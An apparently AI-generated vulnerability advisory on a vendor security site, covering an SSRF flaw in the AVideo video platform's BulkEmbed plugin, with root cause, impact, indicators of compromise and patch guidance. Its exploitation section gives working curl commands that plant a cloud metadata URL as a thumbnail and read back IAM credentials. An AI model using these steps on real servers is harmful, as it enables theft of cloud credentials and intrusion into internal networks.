CVE-2026-33294: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-33294 is a Server-Side Request Forgery (SSRF) vulnerability in the BulkEmbed plugin of WWBN AVideo, a self-hosted video platform. The flaw allows authenticated low-privileged users to force the server to fetch arbitrary internal URLs via the thumbnail mechanism, with the full HTTP response body returned to the attacker. All versions of AVideo up to and including 25.0 are affected; version 26.0 contains the fix. The vulnerability was disclosed on March 18, 2026, and carries a CVSS v3.1 score of 5.0 (Moderate) per the GitHub Advisory, with a scope-changed vector (GitHub Advisory, AVideo Security Advisory).

Technical details

The root cause (CWE-918) is that plugin/BulkEmbed/save.json.php passes the attacker-controlled $_POST['itemsToSave'][x]['thumbs'] value directly to url_get_contents() without invoking the isSSRFSafeURL() guard that protects all six other URL-fetching endpoints in AVideo. The internal url_get_contents() function only calls isValidURLOrPath(), which validates URL format (scheme and host presence) but does not block private IP ranges, localhost, or cloud metadata endpoints such as 169.254.169.254. Critically, this is a full-read SSRF — the HTTP response body is written to disk as the video poster image and served publicly, allowing the attacker to retrieve the response simply by viewing the saved thumbnail. Exploitation requires only a valid authenticated session with BulkEmbed permission (the onlyAdminCanBulkEmbed option defaults to true but is commonly disabled on multi-user platforms) (GitHub Advisory, AVideo Security Advisory).

Impact

Successful exploitation enables an authenticated attacker to exfiltrate cloud IAM credentials (AWS, GCP, Azure) from instance metadata services (e.g., http://169.254.169.254/latest/meta-data/iam/security-credentials/), potentially granting access to S3 buckets, databases, and other cloud infrastructure. Beyond credential theft, the attacker can perform internal network reconnaissance by probing private IP ranges and observe which requests return content versus time out, effectively mapping internal topology. Any HTTP-accessible internal service — admin panels, monitoring dashboards, databases with HTTP interfaces — can have its responses exfiltrated through the thumbnail mechanism, crossing security boundaries from the web application into the internal network and cloud infrastructure (GitHub Advisory, AVideo Security Advisory).

Exploitability

A detailed proof-of-concept exploit with step-by-step curl commands is publicly available in the GitHub security advisory, targeting the plugin/BulkEmbed/save.json.php endpoint with cloud metadata URLs (AVideo Security Advisory). There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.013% (2nd percentile), indicating low near-term exploitation probability (GitHub Advisory). No threat actor attribution has been reported.

Exploitation steps

  1. Reconnaissance: Identify AVideo instances running version 25.0 or earlier. Confirm the BulkEmbed plugin is enabled and that the onlyAdminCanBulkEmbed setting is disabled (common on multi-user platforms), or obtain an admin-level account.
  2. Authenticate: Obtain a valid session cookie by logging in to the AVideo instance:
COOKIE=$(curl -s -c - "http://avideo.local/user" \
  -d "user=testuser&pass=testpass&redirectUri=/" | grep PHPSESSID | awk '{print $NF}')
  1. Submit malicious thumbnail URL: Send a POST request to the BulkEmbed save endpoint, supplying an internal or cloud metadata URL as the thumbnail value:
curl -s -b "PHPSESSID=$COOKIE" \
  "http://avideo.local/plugin/BulkEmbed/save.json.php" \
  -d "itemsToSave[0][title]=SSRF+Test" \
  -d "itemsToSave[0][description]=test" \
  -d "itemsToSave[0][duration]=PT1M" \
  -d "itemsToSave[0][link]=https://www.youtube.com/watch?v=dQw4w9WgXcQ" \
  -d "itemsToSave[0][thumbs]=http://169.254.169.254/latest/meta-data/iam/security-credentials/" \
  -d "itemsToSave[0][date]="
  1. Extract video filename: Parse the JSON response to obtain the videos_id or filename of the newly created video entry.
  2. Retrieve SSRF response: Fetch the saved poster image, which contains the raw HTTP response body from the internal target (e.g., AWS IAM role names or temporary credentials):
curl -s "http://avideo.local/videos/{filename}.jpg"
  1. Escalate: Use retrieved IAM role names to make additional requests targeting http://169.254.169.254/latest/meta-data/iam/security-credentials/{role} to obtain temporary AWS access keys, secret keys, and session tokens for lateral movement into cloud infrastructure (AVideo Security Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from the AVideo server to 169.254.169.254 (AWS/Azure metadata), metadata.google.internal, or private IP ranges (RFC 1918: 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) and localhost/127.0.0.1.
  • Logs: AVideo error log (_error_log) entries matching the pattern thumbs=http://169.254.169.254/... or thumbs=http://10.x.x.x/...; entries showing BulkEmbed: SSRF protection blocked thumbnail URL (post-patch, indicating attempted exploitation).
  • File System: Newly created .jpg files in the AVideo videos/ directory whose content is not a valid image but instead contains plaintext (e.g., JSON, HTML, or credential data from internal services).
  • Web Access Logs: POST requests to /plugin/BulkEmbed/save.json.php with itemsToSave[0][thumbs] parameters containing internal IP addresses or metadata service URLs; subsequent GET requests to /videos/{filename}.jpg from the same session shortly after the POST (AVideo Security Advisory).

Mitigation and workarounds

Upgrade WWBN AVideo to version 26.0 or later, which adds isSSRFSafeURL() validation before the url_get_contents() call in plugin/BulkEmbed/save.json.php (commit 4589a3a) (AVideo Patch Commit). As an interim workaround, restrict network-level access from the AVideo application server to cloud metadata endpoints (169.254.169.254) and internal IP ranges using host-based firewall rules or cloud security groups. Additionally, enable the onlyAdminCanBulkEmbed option to limit BulkEmbed access to administrators only, and deploy WAF rules to detect and block SSRF attempts targeting metadata endpoints and private IP ranges in POST body parameters (GitHub Advisory).

Community reactions

The vulnerability was reported by a researcher credited as "offset" in the GitHub advisory and published by AVideo maintainer DanielnetoDotCom on March 18, 2026. A technical write-up was published by Infinit Security shortly after disclosure (Infinit Security). The CVE was noted in automated feeds including Bluesky CVE tracking accounts and aggregators such as VulDB and CVEFeed, but no significant broader media coverage or notable researcher commentary beyond the advisory itself has been identified.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management